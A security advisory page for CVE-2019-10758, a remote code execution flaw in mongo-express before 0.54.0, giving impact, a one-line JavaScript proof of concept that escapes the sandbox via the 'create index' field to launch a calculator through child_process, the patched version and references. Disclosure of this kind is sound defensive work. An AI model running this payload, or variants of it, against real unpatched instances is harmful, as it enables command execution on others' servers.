First published: Tue Dec 24 2019(Updated: )
### Impact Remote code execution on the host machine by any authenticated user. ### Proof Of Concept Launching mongo-express on a Mac, pasting the following into the "create index" field will pop open the Mac calculator: ```javascript this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator') ``` ### Patches Users should upgrade to version `0.54.0` ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References [Snyk Security Advisory](https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215) [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758) ### For more information If you have any questions or comments about this advisory: * Open an issue in [example link to repo](http://example.com) * Email us at [example email address](mailto:example@example.com) #### Thanks @JLLeitschuh for finding and reporting this vulnerability
Credit: report@snyk.io report@snyk.io
Affected Software | Affected Version | How to fix |
---|---|---|
Mongo-express Project Mongo-express | <0.54.0 | |
npm/mongo-express | <0.54.0 | 0.54.0 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2019-10758 is a vulnerability in MongoDB mongo-express that allows for remote code execution on the host machine by any authenticated user.
CVE-2019-10758 has a severity rating of 9.9 (Critical).
To fix the CVE-2019-10758 vulnerability, update mongo-express to version 0.54.0 or later.
The vulnerability affects MongoDB mongo-express version up to and excluding 0.54.0.
You can find more information about CVE-2019-10758 at the following references: [Reference 1](https://github.com/mongo-express/mongo-express/security/advisories/GHSA-h47j-hc6x-h3qq), [Reference 2](https://github.com/mongo-express/mongo-express/pull/522), [Reference 3](https://github.com/mongo-express/mongo-express/commit/7d365141deadbd38fa961cd835ce68eab5731494).